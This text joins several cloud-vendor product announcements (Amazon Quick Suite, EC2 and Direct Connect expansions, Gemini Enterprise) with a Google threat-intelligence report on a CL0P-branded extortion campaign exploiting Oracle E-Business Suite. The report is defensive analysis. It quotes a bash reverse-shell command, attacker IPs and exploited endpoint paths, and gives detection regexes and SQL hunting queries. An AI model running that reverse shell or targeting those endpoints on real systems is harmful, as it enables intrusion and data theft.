Today, we’re announcing the general availability of Amazon Quick Suite—a new set of agentic teammates that help you get the answers you need using all of your business data and move instantly from insights to action. Quick Suite retrieves insights across the public internet and all your documents, including information in Slack, Salesforce, Snowflake, databases, and other places your company keeps important data. Whether you need a single data point, a PhD-level research project, an entire strategy tailored to your context, or anything in between, Quick Suite quickly gets you all the relevant information.
Quick Suite helps you seamlessly transition from getting answers to taking action in popular applications (like creating or updating Salesforce opportunities, Jira tickets, or ServiceNow incidents). Quick Suite can also help you automate tasks—from routine daily tasks, like responding to RFPs and preparing for customer meetings, to the most complex business processes, such as invoice processing and account reconciliation. All of your data is safe and private. Your queries and data are never used to train models, and you can tailor the Quick Suite experience to you. Your AWS administrator can turn on Quick Suite in only a few steps, and your new agentic teammate will be ready to go. New Quick Suite customers receive a 30-day free trial for up to 25 users.
You can experience the full breadth of Quick Suite capabilities for chat, research, business intelligence, and automation in the following AWS Regions: US East (N. Virginia), US West (Oregon), Asia Pacific (Sydney), and Europe (Ireland), and we’ll expand availability to additional AWS Regions over the coming months.
To learn more about Quick Suite and its capabilities, read our deep-dive blog.
Today, AWS announced the expansion of 10 Gbps and 100 Gbps dedicated connections with MACsec encryption capabilities at the existing AWS Direct Connect location in the Netrality KC1 data center near Kansas City, MO. You can now establish private, direct network access to all public AWS Regions (except those in China), AWS GovCloud Regions, and AWS Local Zones from this location.
The Direct Connect service enables you to establish a private, physical network connection between AWS and your data center, office, or colocation environment. These private connections can provide a more consistent network experience than those made over the public internet.
For more information on the more than 146 Direct Connect locations worldwide, visit the locations section of the Direct Connect product detail pages. Or, visit our getting started page to learn more about how to purchase and deploy Direct Connect.
AI is presenting a once-in-a-generation opportunity to transform how you work, how you run your business, and what you build for your customers. But the first wave of AI, while promising, has been stuck in silos, unable to orchestrate complex work across an entire organization.
True transformation requires a comprehensive platform that connects to your context, your workflows, and your people. That’s why today, we are proud to introduce Gemini Enterprise: the new front door for AI in the workplace.
Delivering this level of transformation requires a complete, full-stack approach to innovation, and this is where Google leads. Our advantage starts with reliable, purpose-built AI infrastructure and is powered by the pioneering research of Google DeepMind and our versatile Gemini family of models. Sundar talks more about our company-wide approach in his blog.
This complete, AI-optimized stack is why nine of the top 10 AI labs and nearly every AI unicorn already use Google Cloud. It’s why 65% of all our customers are using our AI products, including Banco BV, Behr, Box, DBS Bank, Deloitte, Deutsche Telekom, Fairprice Group, the US Department of Energy, and many more around the world. Today, we’re proud to announce more AI wins with Figma, GAP, Gordon Foods, Klarna, Macquarie Bank, Melexis, Mercedes, Signal Iduna, Valiuz, and Virgin Voyages. And we’re excited to be the official cloud provider of the LA28 Games, where Google Cloud will bring our AI innovations to the Olympic and Paralympic Games.
AI that transforms how you work
Gemini Enterprise brings the best of Google AI to every employee through an intuitive chat interface that acts as a single front door for AI in the workplace. Behind that simple interface, Gemini Enterprise unifies six core components:
The platform is powered by Google’s most advanced Gemini models, which serve as the brains of the system and provide world-class intelligence for every task.
Through a no-code workbench, any user — from marketing to finance, and any other team — can analyze information and orchestrate agents to automate processes across the organization.
To deliver value from day one, it includes a taskforce of pre-built Google agents for specialized jobs like deep research and data insights, and you can easily augment this with custom agents your teams build or with solutions from our extensive partner ecosystem.
An agent is only as good as its context, so Gemini Enterprise securely connects to your company’s data wherever it lives — from Google Workspace and Microsoft 365 to business applications like Salesforce and SAP.
This is managed with a central governance framework, so you can visualize, secure, and audit all of your agents from one place.
And it is all built on a principle of openness with an ecosystem of over 100,000 partners. This ensures customer choice and fosters innovation.
By bringing all of these components together through a single interface, Gemini Enterprise transforms how teams work. It moves beyond simple tasks to automate entire workflows and drive smarter business outcomes — all on Google’s secure, enterprise-grade architecture.
Some companies offer AI models and toolkits, but they are handing you the pieces, not the platform. They leave your teams to stitch everything together. But you cannot piece together transformation.
That’s exactly what we built with Gemini Enterprise: a complete, AI-optimized platform — from our purpose-built Tensor Processing Units to our world-class Gemini models, all the way to the platform and agents that transform workflows. This is what it takes to deliver a truly unified AI fabric for your business, and it’s why customers are already putting Gemini Enterprise to work:
Banco BV’s relationship managers used to spend hours doing their own analytics. Now, with the help of Gemini Enterprise, it’s done for them, leaving managers with more time to convert new business.
Harvey is the leading domain-specific AI for legal and professional services, trusted by Fortune 500 legal teams. Powered by Gemini, Harvey makes lawyers more efficient across contract analysis, due diligence, compliance, and litigation, saving them hours of work.
This isn’t just about making one task easier. It’s about making entire workflows smarter, by searching and finding information across all your enterprise documents, applications, email, and chat systems, and by automating processes with agents in any of your enterprise applications.
Gemini Enterprise highlights our commitment to an open platform – working seamlessly in Microsoft 365 and SharePoint environments. And when you use Gemini Enterprise with Google Workspace, you get further benefits. Today, we are announcing the first of many multi-modal agents harnessing the power of Gemini to understand and create text, image, video and speech, built right into the Workspace apps you already use:
Video: With Google Vids, you can now transform one type of information, like a presentation, into a completely different format — an engaging video, complete with an AI-generated script and voiceover. The momentum for Vids has been incredible, with 2.5 million people using it every month.
Voice: In Google Meet, we are bringing real-time speech translation to all business customers. This goes beyond just words, capturing your natural tone and expression to make conversations seamless, no matter what language you speak. This builds on the voice intelligence from our ‘take notes for me’ feature, which has seen usage grow more than 13x since the beginning of the year.
An agent is only as good as its context. Gemini Enterprise integrates with your organization’s data — wherever it lives — to build that context, and deliver relevant, accurate, and trustworthy results. Today, as part of Gemini Enterprise, we are announcing:
A new Data Science Agent, in preview, to automate data wrangling and ingestion. It accelerates detailed data exploration by instantly finding patterns, and streamlines complex model development by generating multi-step plans for training and inference, eliminating manual, iterative fine-tuning.
Customers like Morrisons, Vodafone, and Walmart are already using this agent to accelerate their data workflows and remove friction from the customer experience.
AI that transforms how you run your business
Customer engagement is one of the most critical use cases for AI adoption, and our Customer Engagement Suite – our conversational AI solution for web, mobile apps, call centers, and point of sale – works alongside your customer service reps to answer questions via chat and voice and to take action. The business impact is real, and leading companies are seeing results now:
Commerzbank was an early adopter of Customer Engagement Suite, using it to build Bene, its own specialized chatbot. They are now leveraging Gemini to further enhance the experience, enabling it to handle over two million chats and successfully resolve 70% of all inquiries.
Mercari, Japan’s largest online marketplace, is overhauling its contact center with Google AI to foster an AI-driven customer service experience, which is projected to yield a 500% ROI by reducing customer service rep workloads by at least 20%.
Today, we are announcing true, next-generation conversational agents, in preview, that connect directly into Gemini Enterprise. These provide more value to you in the following ways:
How you build: We are introducing a new, easy-to-use low-code visual builder. You can build a customer engagement agent once, and configure it for all your channels — telephony, web, mobile, email, and chat. These new agents support over 40 languages.
The underlying intelligence: These next-gen agents are powered by our latest Gemini models. This means incredible, natural-sounding voices, with the ability to handle accent transitions and real-world noise from a bad phone connection with industry-leading accuracy and latency.
Your time-to-value: The new AI augmentation services and prebuilt specialized agents allow agent builders to build, test, deploy, and monitor agents faster than ever. In addition, AI-assisted coaching vastly increases the productivity of your employees. This makes your entire contact center — both human and digital — more efficient and effective.
Deep enterprise integration: These agents are designed to connect directly into Gemini Enterprise. This unlocks two key advantages: deeper personalization, using real-time context from all your business systems; and unified governance, allowing you to manage all your agents from the same central platform.
AI that transforms what you build
The ultimate transformation is when you use AI to create entirely new experiences for your customers. This starts with empowering the developers who are building your agents and applications. In just three months since launch, over one million developers are already building with Gemini CLI, an AI agent that lets developers interact with Google’s Gemini models directly from a terminal for task automation, code generation, and research using natural language. It has become an essential tool for developers around the world, whose workflows are becoming more complex every day. The best AI shouldn’t force you to switch contexts; it should adapt to your toolchain.
That’s why we introduced Gemini CLI extensions — a new framework to customize your command-line AI and connect it to the services you rely on most. This allows you to build a more intelligent, personalized workflow with a growing ecosystem of extensions from Google, and industry leaders like Atlassian, GitLab, MongoDB, Postman, Shopify, Stripe, and more. It turns your CLI from a simple tool into a personalized command center.
Innovation with agents is leading to an entirely new agent economy, where developers, ISVs and partners can build and earn revenue from specialized agents that communicate and transact with one another. To enable this, we have worked with the industry on an open standard called the Agent2Agent Protocol (A2A), which along with Model Context Protocol (MCP), sets the standard for how agents communicate.
But for agents to be truly autonomous, they must be able to transact. To provide a secure and auditable way for agents to complete payments, last month we announced a new, open protocol: the Agent Payments Protocol (AP2). This is a first-of-its-kind effort, developed with over 100 payment and technology partners, like American Express, Coinbase, Intuit, Mastercard, PayPal, ServiceNow, and Salesforce to establish how agents securely enable financial transactions.
By working with our partners and the larger community to build standardized protocols for key aspects, such as context, communication and commerce, we are laying the foundation for the agent economy.
Our customers are also building our Gemini models directly into their products:
Klarna is using tools like Gemini and Veo to create bespoke lookbooks that are dynamic, personalized and impactful with shoppers, increasing orders by 50%.
Mercedes-Benz builds cars with Google AI that can talk to their drivers. They are using Google Cloud’s Automotive AI Agent, built with Gemini on Vertex AI, to power the MBUX Virtual Assistant, which enables natural conversations and provides personalized answers to drivers for things like navigation and points of interest.
Swarovski creates personalized customer experiences with Vertex AI, resulting in a 17% increase in email open rates and 10x faster campaign localization.
This transformation goes beyond code. Our Gemini family of models has been used to create over 13 billion images and 230 million videos. For example:
Figma is helping their community create more than ever. With tools across their platform powered by the Gemini 2.5 Flash Image model (more commonly known as Nano Banana), their users can now make high-quality, brand-approved images with just a prompt, edit details with AI, and get all the variety their project needs.
Virgin Voyages is using Veo’s “text-to-video” and Imagen to create thousands of hyper-personalized advertisements and emails. Each one perfectly matches Virgin Voyages’ unique brand voice at a scale that would be impossible just a year ago.
The number of customers using our AI models in Vertex AI continues to grow, including top brands like Adobe, Cathay Pacific, Kraft Heinz, LATAM Airlines, Toyota, Unilever, and more.
The future of AI must be open
Google Cloud’s AI strategy is built on a foundational belief: The future of AI requires an open, collaborative partner ecosystem to ensure customer choice. To make this real, we have built a comprehensive agentic AI ecosystem with more than 100,000 partners supporting every layer of our AI stack – AI infrastructure, AI tooling, ISVs, and services partners. Today, we are advancing this ecosystem in four critical ways:
Expanded cross-platform workflows: We’re expanding our work with partners like Box, OpenText, ServiceNow, and Workday – tools you use every day – to enable sophisticated, cross-platform workflows right out of the box.
Scaling with partners: Industry-leading partners, including BCG, Capgemini, HCLTech, Infosys, McKinsey, TCS, Wipro, and many others can assist with planning, deployment, and custom agent development to speed your adoption of Gemini Enterprise. And Accenture, Cognizant, Deloitte, KPMG, and PwC are making announcements today on their internal adoption and expanded services for Gemini Enterprise.
Discover validated agents: Customers can now use a new AI agent finder to discover the right agent for their needs, with assurance that the thousands of agents they can find, filter, and deploy have been reviewed for security and interoperability.
Market & monetize agents: For those partners building AI agents, we provide you with a simple, powerful way to market and earn revenue from your solutions, instantly connecting you with millions of Google Cloud customers.
Enabling your transformation
Delivering this level of transformation requires a commitment to upskilling your teams. So today, we are announcing a comprehensive set of programs to help you succeed.
To upskill your entire workforce, we are introducing Google Skills, our new platform where training from across Google – from Gemini Enterprise to Google DeepMind – is available for free. On this platform, we’re announcing the Gemini Enterprise Agent Ready (GEAR) program, a new educational sprint designed to empower one million developers to build and deploy agents. Click here to be the first to use Google Skills and learn more about GEAR.
For organizations that want our experts embedded side-by-side with your teams, we are proud to announce a new team – Delta – an elite group of Google AI engineers to help you tackle your most complex challenges.
These programs are all designed to do one thing: help you and your teams build your future with AI.
Your foundation for the future
As AI transforms organizations around the world, Google is the only partner with the full set of offerings that you can tailor to your organization’s needs. And most importantly, we are delivering real business value to help you drive ROI from your AI investments.
This is the power of Gemini Enterprise: the new front door for AI in the workplace. We’re bringing the best of Google AI to every employee, for every workflow. And we’re excited to support you every step of the way.
Amazon Web Services (AWS) announces the availability of high performance Storage Optimized Amazon EC2 I7i instances in the AWS Europe (Spain) region. Powered by 5th generation Intel Xeon Scalable processors with an all-core turbo frequency of 3.2 GHz, these new instances deliver up to 23% better compute performance and more than 10% better price performance over previous generation I4i instances. Powered by 3rd generation AWS Nitro SSDs, I7i instances offer up to 45TB of NVMe storage with up to 50% better real-time storage performance, up to 50% lower storage I/O latency, and up to 60% lower storage I/O latency variability compared to I4i instances.
I7i instances offer the best compute and storage performance among x86-based storage optimized instances in Amazon EC2, making them ideal for I/O-intensive, latency-sensitive workloads that demand very high random IOPS performance with real-time latency when accessing small to medium-sized datasets (multiple TBs). Additionally, the torn write prevention feature supports up to 16 KB block sizes, enabling customers to eliminate database performance bottlenecks.
I7i instances are available in eleven sizes – nine virtual sizes up to 48xlarge and two bare metal sizes – delivering up to 100Gbps of network bandwidth and 60Gbps of Amazon Elastic Block Store (EBS) bandwidth. To learn more, visit the I7i instances page.
Written by: Peter Ukhanov, Genevieve Stark, Zander Work, Ashley Pearson, Josh Murchie, Austin Larsen
Introduction
On Sept. 29, 2025, Google Threat Intelligence Group (GTIG) and Mandiant began tracking a new, large-scale extortion campaign by a threat actor claiming affiliation with the CL0P extortion brand. The actor began sending a high volume of emails to executives at numerous organizations, alleging the theft of sensitive data from the victims’ Oracle E-Business Suite (EBS) environments. On Oct. 2, 2025, Oracle reported that the threat actors may have exploited vulnerabilities that were patched in July 2025 and recommended that customers apply the latest critical patch updates. On Oct. 4, 2025, Oracle directed customers to apply emergency patches to address this vulnerability, reiterating their standing recommendation that customers stay current on all Critical Patch Updates.
Our analysis indicates that the CL0P extortion campaign followed months of intrusion activity targeting EBS customer environments. The threat actor(s) exploited what may be CVE-2025-61882 as a zero-day vulnerability against Oracle EBS customers as early as Aug. 9, 2025, weeks before a patch was available, with additional suspicious activity dating back to July 10, 2025. In some cases, the threat actor successfully exfiltrated a significant amount of data from impacted organizations.
This post provides an in-depth analysis of the campaign, deconstructs the multi-stage Java implant framework used by the threat actors to compromise Oracle EBS, details the earlier exploitation activity, and provides actionable guidance and indicators of compromise (IOCs) for defenders.
Background
The CL0P (aka CL0P^_- LEAKS) data leak site (DLS) was established in 2020. Initially, GTIG observed the DLS used for multifaceted extortion operations involving CL0P ransomware and attributed to FIN11. More recently, the majority of the alleged victims appear to be associated with data theft extortion incidents stemming from the mass exploitation of zero-day vulnerabilities in managed file transfer (MFT) systems, including the Accellion legacy file transfer appliance (FTA), GoAnywhere MFT, MOVEit MFT, and Cleo LexiCom. In most of these incidents, the threat actors conducted mass exploitation of zero-day (0-day) vulnerabilities, stole victim data, then initiated extortion attempts several weeks later. While this data theft extortion activity has most frequently been attributed to FIN11 and suspected FIN11 threat clusters, we have also observed evidence that CL0P ransomware and the CL0P DLS are used by at least one threat actor with different tactics, techniques, and procedures (TTPs). This could suggest that FIN11 has expanded their membership or partnerships over time.
This latest campaign targeting Oracle EBS marks a continuation of this successful and high-impact operational model.
Figure 1: Oct. 8 updated CL0P DLS site
Threat Detail
The CL0P Extortion Campaign
Starting Sept. 29, 2025, the threat actor launched a high-volume email campaign from hundreds, if not thousands, of compromised third-party accounts. The credentials for these accounts—which belong to diverse, unrelated organizations—were likely sourced from infostealer malware logs sold on underground forums. This is a common tactic used by threat actors to add legitimacy and bypass spam filters. The emails, sent to company executives, claimed the actor had breached their Oracle EBS application and exfiltrated documents.
Notably, the emails contain two contact addresses, support@pubstorm.com and support@pubstorm.net, that have been listed on the CL0P DLS since at least May 2025. To substantiate their claims, the threat actor has provided legitimate file listings from victim EBS environments to multiple organizations with data dating back to mid-August 2025. The extortion emails have indicated that alleged victims can prevent the release of stolen data in exchange for payment, but the amount and method have not been specified. This is typical of most modern extortion operations, in which the demand is typically provided after the victim contacts the threat actors and indicates that they are authorized to negotiate.
To date, GTIG has not observed victims from this campaign on the CL0P DLS. This is consistent with past campaigns involving the CL0P brand, where actors have typically waited several weeks before posting victim data.
Figure 2: Extortion email sent to victim executives
Technical Analysis: Deconstructing the Exploits
We have identified exploitation activity targeting Oracle E-Business Suite (EBS) servers occurring prior to the recent extortion campaign, likely dating back to July 2025.
Oracle released a patch on Oct. 4 for CVE-2025-61882, which referenced a leaked exploit chain targeting the UiServlet component. However, Mandiant has observed multiple different exploit chains involving Oracle EBS, and it is likely that a different chain was the basis for the Oct. 2 advisory that originally suggested a known vulnerability was being exploited. It is currently unclear which specific vulnerabilities and exploit chains correspond to CVE-2025-61882; however, GTIG assesses that Oracle EBS servers updated through the patch released on Oct. 4 are likely no longer vulnerable to known exploitation chains.
July 2025 Activity: Suspicious Activity Involving ‘UiServlet’
Mandiant incident responders identified activity in July 2025 targeting Oracle EBS servers where application logs suggested exploitation targeting /OA_HTML/configurator/UiServlet. The artifacts recovered in Mandiant’s investigations have some overlap with an exploit leaked in a Telegram group named “SCATTERED LAPSUS$ HUNTERS” on Oct. 3, 2025. However, GTIG lacks sufficient evidence to directly correlate the activity observed in July 2025 with use of this exploit. At this time, GTIG does not assess that actors associated with UNC6240 (aka “Shiny Hunters”) were involved in this exploitation activity.
The leaked exploit, as analyzed by watchTowr Labs, combines several distinct primitives, including Server-Side Request Forgery (SSRF), Carriage-Return Line-Feed (CRLF) injection, an authentication bypass, and XSL template injection, to gain remote code execution on the target Oracle EBS server. As mentioned, it’s not clear which CVE corresponds to any of the vulnerabilities exploited in this chain. Any commands executed following exploitation would use sh on Linux, or cmd.exe on Windows.
The leaked exploit archive included sample invocations showing its use for executing a Bash reverse shell, with a command structured like bash -i >& /dev/tcp/<ip>/<port> 0>&1.
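Defenders can sweep process or shell-history telemetry for command lines of this shape. The following is a minimal hunting sketch; the regular expressions are our own generalization of the quoted sample invocation, not an official IOC set:

```python
import re

# Patterns generalized from the leaked exploit's sample invocation: an
# interactive shell redirected over /dev/tcp (the classic bash reverse shell).
REVERSE_SHELL_PATTERNS = [
    re.compile(r"bash\s+-i\b.*/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    re.compile(r"sh\s+-i\b.*/dev/tcp/"),
]

def is_suspicious_command(cmdline: str) -> bool:
    """Return True if a command line matches a reverse-shell shape."""
    return any(p.search(cmdline) for p in REVERSE_SHELL_PATTERNS)

# The first sample mirrors the structure quoted from the leaked archive
# (IP and port are illustrative).
print(is_suspicious_command("bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"))  # True
print(is_suspicious_command("bash -c 'ls -la'"))  # False
```

Feeding EDR command-line telemetry or shell history through a check like this surfaces candidates for manual review; it is a triage aid, not a verdict.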
Activity Observed Before July 2025 Patch Release
On July 10, 2025, prior to the release of the July 2025 Oracle EBS security updates, Mandiant identified suspicious HTTP traffic from 200.107.207.26. GTIG was unable to confirm the exact nature of this activity, but it’s plausible that this was an early attempt at exploitation of Oracle EBS servers. However, there was no available forensic evidence showing outbound HTTP traffic consistent with the remote XSL payload retrieval performed in the leaked exploit, nor were any suspicious commands observed being executed, preventing us from assessing that this was an actual exploitation attempt.
Additionally, internet scan data showed that the server was exposing a Python AIOHTTP server at approximately the same time as the aforementioned activity, which is consistent with use of the callback server in the publicly leaked exploit.
Activity Observed After July 2025 Patch Release
After the patches were released, Mandiant observed likely exploitation attempts from 161.97.99.49 against Oracle EBS servers, with HTTP requests for /OA_HTML/configurator/UiServlet recorded. Notably, various logs involving EBS indicate that some of these requests timed out, suggesting the SSRF vulnerability present in the leaked public exploit, or follow-on activity that would’ve cleanly closed the request, may have failed. These errors were not observed in the activity recorded prior to the July 2025 patch release.
GTIG is not currently able to confirm whether both of these sets of activity were conducted by the same threat actor.
August 2025 Activity: Exploit Chain Targeting ‘SyncServlet’
In August 2025, a threat actor began exploiting a vulnerability in the SyncServlet component, allowing for unauthenticated remote code execution. This activity originated from multiple threat actor servers, including 200.107.207.26, as observed in the aforementioned activity.
Exploit Flow: The attack is initiated with a POST request to /OA_HTML/SyncServlet. The actor then uses the XDO Template Manager functionality to create a new, malicious template within the EBS database. The final stage of the exploit is a request that triggers the payload via the Template Preview functionality. A request to the following endpoint is a high-fidelity indicator of compromise:
The malicious payload is stored as a new template in the XDO_TEMPLATES_B database table. The template name (TemplateCode) consistently begins with the prefix TMP or DEF, and the TemplateType is set to XSL-TEXT or XML, respectively. The following is an example of a payload stored in the database with the Base64 payload redacted:
Notably, the structure of this XSL payload is identical to the XSL payload in the leaked Oracle EBS exploit previously discussed.
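The request paths named throughout this analysis can be swept for directly in EBS web-tier access logs. The following sketch assumes Apache-style combined log format; adjust the parsing to your deployment's actual log layout:

```python
import re

# Request paths referenced in this analysis; treat any hit as worth triage.
IOC_PATHS = [
    "/OA_HTML/configurator/UiServlet",   # July 2025 activity
    "/OA_HTML/SyncServlet",              # August 2025 exploit flow
    "/help/state/content/destination./navId.1/navvSetId.iHelp/",      # SAGE* trigger
    "/support/state/content/destination./navId.1/navvSetId.iHelp/",   # SAGEWAVE variant
]

# Combined-log-format line: ip - - [timestamp] "METHOD path HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def scan_log_lines(lines):
    """Yield (client_ip, timestamp, method, path) for requests to IOC paths."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        if any(path.startswith(p) for p in IOC_PATHS):
            yield ip, ts, method, path

# Hypothetical log lines: only the SyncServlet request should be flagged.
sample = [
    '203.0.113.7 - - [09/Aug/2025:12:00:01 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 512',
    '198.51.100.9 - - [09/Aug/2025:12:00:02 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 128',
]
for hit in scan_log_lines(sample):
    print(hit)
```

Matching on path prefixes rather than exact strings also catches requests that append query strings or extra path segments to the IOC endpoints.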
GTIG has identified at least two different chains of Java payloads embedded in the XSL payloads, some of which have also been discussed publicly:
GOLDVEIN.JAVA – Downloader: A Java variant of GOLDVEIN, a downloader that makes a request back to an attacker-controlled command-and-control (C2 or C&C) IP address to retrieve and execute a second-stage payload. This beacon is disguised as a “TLSv3.1” handshake and contains logging functionality that returns the execution result to the actor in the HTTP response, within an HTML comment. Mandiant hasn’t recovered any follow-on payloads downloaded by GOLDVEIN.JAVA at this time.
GOLDVEIN was originally written in PowerShell and was first observed in the exploitation campaign of multiple Cleo software products in December 2024 by a suspected FIN11 threat cluster tracked as UNC5936.
SAGE* Infection Chain: A nested chain of multiple Java payloads resulting in a persistent filter that monitors for requests to endpoints containing /help/state/content/destination./navId.1/navvSetId.iHelp/ to deploy additional Java payloads.
The XSL payload contains a Base64-encoded SAGEGIFT payload. SAGEGIFT is a custom Java reflective class loader, written for Oracle WebLogic servers.
SAGEGIFT is used to load SAGELEAF, an in-memory dropper based on public code for reflectively loading Oracle WebLogic servlet filters, with additional logging code embedded in it. Logs in SAGELEAF are retrieved by the parent SAGEGIFT payload that loaded it, and they can be returned to the actor in the HTTP response within an HTML comment (structured the same way as GOLDVEIN.JAVA).
SAGELEAF is used to install SAGEWAVE, a malicious Java servlet filter that allows the actor to deploy an AES-encrypted ZIP archive with Java classes in it. Based on our analysis, there is a main payload of SAGEWAVE that may be similar to the Cli module of GOLDTOMB; however, at this time we have not directly observed this final stage.
Mandiant has observed variants of SAGEWAVE where the HTTP header X-ORACLE-DMS-ECID must be set to a specific, hardcoded value for the request payload to be processed, and has also seen different HTTP paths used for request filtering, including /support/state/content/destination./navId.1/navvSetId.iHelp/.
Figure 3: SAGE* infection chain/trigger diagram
Following successful exploitation, the threat actor has been observed executing reconnaissance commands from the EBS account “applmgr.” These commands include:
Furthermore, Mandiant observed the threat actor launching additional bash processes from Java (EBS process running a GOLDVEIN.JAVA second-stage payload) using bash -i and then executing various commands from the newly launched bash process. Child processes of any bash -i process launched by Java running as the EBS account “applmgr” should be reviewed as part of hunting for threat actor commands.
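That review can be partially automated against a process snapshot. The sketch below assumes `ps`-style records of (pid, ppid, user, command); the record layout and sample data are illustrative assumptions:

```python
from collections import namedtuple

# Illustrative process record; map your EDR telemetry or
# `ps -eo pid,ppid,user,cmd` output into this shape.
Proc = namedtuple("Proc", "pid ppid user cmd")

def find_suspect_shells(procs):
    """Return children of any 'bash -i' process that was itself launched by a
    Java process running as the EBS account 'applmgr', per the observed
    tradecraft."""
    by_pid = {p.pid: p for p in procs}
    suspect_bash = {
        p.pid
        for p in procs
        if p.user == "applmgr"
        and p.cmd.startswith("bash -i")
        and p.ppid in by_pid
        and "java" in by_pid[p.ppid].cmd
    }
    return [p for p in procs if p.ppid in suspect_bash]

# Hypothetical snapshot: pid 201 matches the pattern and should be reviewed.
snapshot = [
    Proc(100, 1,   "applmgr", "java -server weblogic.Server"),
    Proc(200, 100, "applmgr", "bash -i"),
    Proc(201, 200, "applmgr", "cat /etc/passwd"),
    Proc(300, 1,   "applmgr", "bash --login"),
]
for p in find_suspect_shells(snapshot):
    print(p.pid, p.cmd)  # 201 cat /etc/passwd
```

A live snapshot loses history once processes exit, so pairing this with process-creation audit logs (auditd execve records or EDR events) gives far better coverage of short-lived commands.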
Attribution: Overlaps with Confirmed and Suspected FIN11 Activity
GTIG has not formally attributed this activity to a tracked threat group at this time. The use of the CL0P extortion brand, including contact addresses (support@pubstorm.com and support@pubstorm.net) that have been listed on the CL0P DLS since at least May 2025, is however notable. GTIG initially observed the DLS used for multifaceted extortion operations involving CL0P ransomware and attributed to FIN11. More recently, the majority of the alleged victims appear to be associated with data theft extortion incidents stemming from the exploitation of managed file transfer (MFT) systems frequently attributed to FIN11 and suspected FIN11 threat clusters. However, we have also observed evidence that the CL0P ransomware and the CL0P DLS have not been used exclusively by FIN11, precluding our ability to attribute based on this factor alone.
In addition to the CL0P overlap, the post-exploitation tooling shows logical similarities to malware previously used in a suspected FIN11 campaign. Specifically, the use of the in-memory Java-based loader GOLDVEIN.JAVA that fetches a second-stage payload is reminiscent of the GOLDVEIN downloader and GOLDTOMB backdoor, which were deployed by the suspected FIN11 cluster UNC5936 during the mass exploitation of the Cleo MFT vulnerability in late 2024. Further, one of the compromised accounts used to send the recent extortion emails was previously used by FIN11. Ongoing analysis may reveal more details about the relationship between this recent activity and other threat clusters—such as FIN11 and UNC5936.
Implications
The pattern of exploiting a zero-day vulnerability in a widely used enterprise application, followed by a large-scale, branded extortion campaign weeks later, is a hallmark of activity historically attributed to FIN11 that has strategic benefits which may also appeal to other threat actors. Targeting public-facing applications and appliances that store sensitive data likely increases the efficiency of data theft operations, given that the threat actors do not need to dedicate time and resources to lateral movement. This overall approach—in which threat actors have leveraged zero-day vulnerabilities, limited their network footprint, and delayed extortion notifications—almost certainly increases the overall impact, given that threat actors may be able to exfiltrate data from numerous organizations without alerting defenders to their presence. CL0P-affiliated actors almost certainly perceive these mass exploitation campaigns as successful, given that they’ve employed this approach since at least late 2020. We therefore anticipate that they will continue to dedicate resources to acquiring zero-day exploits for similar applications for at least the near-term.
Recommendations
GTIG and Mandiant recommend the following actions to mitigate and detect the threats posed by this activity and harden Oracle E-Business Suite environments:
Apply emergency patches immediately: Prioritize the application of the Oracle EBS patches released on Oct. 4, 2025, which mitigate the described exploitation activity (CVE-2025-61882). Given the active, in-the-wild exploitation, this is the most critical step to prevent initial access.
Hunt for malicious templates in the database: The threat actor(s) store payloads directly in the EBS database. Administrators should immediately query the XDO_TEMPLATES_B and XDO_LOBS tables to identify malicious templates. Review any templates where the TEMPLATE_CODE begins with TMP or DEF. The payload is stored in the LOB_CODE column.
SELECT * FROM XDO_TEMPLATES_B WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%' ORDER BY CREATION_DATE DESC;
SELECT * FROM XDO_LOBS ORDER BY CREATION_DATE DESC;
Restrict outbound internet access: The observed Java payloads require outbound connections to C2 servers to fetch second-stage implants or exfiltrate data. Block all non-essential outbound traffic from EBS servers to the internet. This is a compensating control that can disrupt the attack chain even if a server is compromised.
Monitor and analyze network logs: Monitor for indicators of compromise. A request to the TemplatePreviewPG endpoint containing a TemplateCode prefixed with TMP or DEF is a strong indicator of an exploitation attempt. Additionally, investigate anomalous requests to /OA_HTML/configurator/UiServlet and /OA_HTML/SyncServlet.
Leverage memory forensics: The implants used in this campaign are primarily Java-based and execute in memory. If a compromise is suspected, memory analysis of the Java processes associated with the EBS application may reveal malicious code or artifacts not present on disk.
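The log-based indicators above (requests to TemplatePreviewPG with a TMP- or DEF-prefixed template code, and the two servlet paths) can be encoded as a simple triage filter. The sketch below assumes the request line is available as text and that TemplateCode appears as a query parameter; access-log formats vary, so treat it as a starting point rather than a definitive signature.

```python
import re

# Substring indicators taken from the recommendations above.
SUSPICIOUS_PATHS = ("/OA_HTML/configurator/UiServlet", "/OA_HTML/SyncServlet")
TEMPLATE_CODE_RE = re.compile(r"TemplateCode=(?:TMP|DEF)")

def flag_log_line(line: str) -> bool:
    """Return True when a request line matches the exploitation indicators."""
    if any(path in line for path in SUSPICIOUS_PATHS):
        return True
    # TemplatePreviewPG requests are only suspicious with a TMP/DEF code.
    return "TemplatePreviewPG" in line and bool(TEMPLATE_CODE_RE.search(line))
```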
Starting today, Amazon Elastic Compute Cloud (Amazon EC2) M6in and M6idn instances are available in the AWS Asia Pacific (Seoul) Region. These sixth-generation network optimized instances, powered by 3rd Generation Intel Xeon Scalable processors and built on the AWS Nitro System, deliver up to 200 Gbps of network bandwidth, 2x the network bandwidth of comparable fifth-generation instances. Customers can use M6in and M6idn instances to scale the performance and throughput of network-intensive workloads such as high-performance file systems, distributed web-scale in-memory caches, caching fleets, real-time big data analytics, and Telco applications such as 5G User Plane Function.
M6in and M6idn instances are available in 10 different instance sizes including metal, offering up to 128 vCPUs and 512 GiB of memory. They deliver up to 100Gbps of Amazon Elastic Block Store (EBS) bandwidth, and up to 400K IOPS. M6in and M6idn instances offer Elastic Fabric Adapter (EFA) networking support on 32xlarge and metal sizes. M6idn instances offer up to 7.6 TB of high-speed, low-latency instance storage.
With this regional expansion, M6in and M6idn instances are available in the following AWS Regions: US East (Ohio, N. Virginia), US West (N. California, Oregon), Europe (Ireland, Frankfurt, Spain, Stockholm, Zurich), Asia Pacific (Mumbai, Singapore, Tokyo, Sydney, Seoul), Canada (Central), and AWS GovCloud (US-West). Customers can purchase the new instances through Savings Plans, On-Demand Instances, and Spot Instances. To learn more, see the M6in and M6idn instances page.
